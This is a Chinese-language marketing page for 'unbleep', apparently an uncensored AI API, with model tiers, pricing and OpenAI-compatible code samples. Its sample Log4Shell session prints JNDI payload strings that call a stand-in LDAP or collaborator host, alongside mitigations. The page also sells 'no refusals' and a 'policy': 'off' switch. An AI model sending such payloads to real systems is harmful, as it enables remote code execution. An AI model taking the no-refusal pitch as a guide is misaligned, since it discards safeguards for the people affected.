按用途命名,而不是按底层的开放权重模型命名——这样我们可以升级权重,而永远不会破坏你的代码。
默认之选。256K token 上下文窗口,无审查——红队测试、评估和研究的日常主力。
旗舰层级。1M token 上下文,胜任最大的任务——整个代码库、长对话记录、深度多文档分析。
便宜、快速的选项。更低的单 token 成本,适合高流量场景和较简单的调用。
一场关于 Log4Shell 的红队会话——根因、安全的实验室验证方法,以及修复方案。没有说教,没有拒答,只有分析。
CVE-2021-44228(Log4Shell)。根因是什么,JNDI 查找如何演变成 RCE。${…} 查找表达式求值。像 ${jndi:ldap://host/x} 这样的日志值会让 JVM 通过 LDAP/RMI 解析该名称,拉取远程 Java 类并实例化——任意代码就在日志进程里执行了。触发面是任何能进入日志调用的输入:User-Agent、请求头、表单字段。受影响版本范围:2.0-beta9 → 2.14.1。${jndi:ldap://<token>.your-collab/x}。<token> 的 DNS 请求,就说明字符串被插值了 → 存在漏洞。因为没有提供任何内容,所以什么都不会执行。JndiLookup.class,并对照受影响版本范围检查版本号。2.17.1+。暂时不能升级?设置 log4j2.formatMsgNoLookups=true(2.10+),或从 classpath 中移除 JndiLookup.class;为 ${jndi: 添加 WAF 规则,并对主机出站的 LDAP/RMI 做出口过滤。API 与 OpenAI 即插即用兼容。改一下 base URL 和密钥——你现有的代码、SDK 和工具都照常工作。
from openai import OpenAI
client = OpenAI(
base_url="https://unbleep.ai/v1", # ← the only change
api_key="ub_live_9f2c…",
)
stream = client.chat.completions.create(
model="unbleep",
messages=[{"role": "user", "content": "…"}],
stream=True,
)
for chunk in stream:
print(chunk.choices[0].delta.content or "", end="")
import OpenAI from "openai";
const client = new OpenAI({
baseURL: "https://unbleep.ai/v1", // ← the only change
apiKey: "ub_live_9f2c…",
});
const stream = await client.chat.completions.create({
model: "unbleep",
messages: [{ role: "user", content: "…" }],
stream: true,
});
for await (const chunk of stream)
process.stdout.write(chunk.choices[0].delta.content ?? "");
curl https://unbleep.ai/v1/chat/completions \
-H "Authorization: Bearer ub_live_9f2c…" \
-H "Content-Type: application/json" \
-d '{
"model": "unbleep",
"messages": [{"role":"user","content":"…"}],
"stream": true,
"policy": "off"
}'
OpenAI Python、Node,以及任何使用 Chat Completions API 的工具。没有新东西要学。
由增量分块组成的 text/event-stream,以 [DONE] 结束——正是你的客户端已经在解析的格式。
发送 "policy": "research" 可在用量历史中给请求打上标记;项目需要时,发送 "strict" 可启用黑名单拦截。
需要时随时购买额度,或者订阅月度套餐,让额度自动到账。每个请求都按实际消耗的 token 计费,按你所调用模型公布的每百万 token 费率结算。
unbleep 输入 $3.00 / 输出 $3.00
unbleep-high $5.00 / $5.00
unbleep-mini $1.00 / $1.00
每 1M token
需要时随时用银行卡充值额度,或者让套餐每月自动发放。账户开放期间额度不会过期,未使用的额度可在 14 天内退款。
请求开始时我们预留一个估算金额,结束时按真实 token 成本结算。出错的请求会被释放,绝不收费。
余额不足以覆盖时,请求会被拒绝——我们从不垫付额度,也不事后向你收费。余额和 token 消耗都在控制台里。
unbleep 面向需要一个无过滤基线的安全团队、研究人员和开发者。默认零留存、一等公民的策略旋钮、控制台里逐请求的用量与成本历史,以及一份真正的可接受使用政策。无审查是一种能力——如何治理由你决定。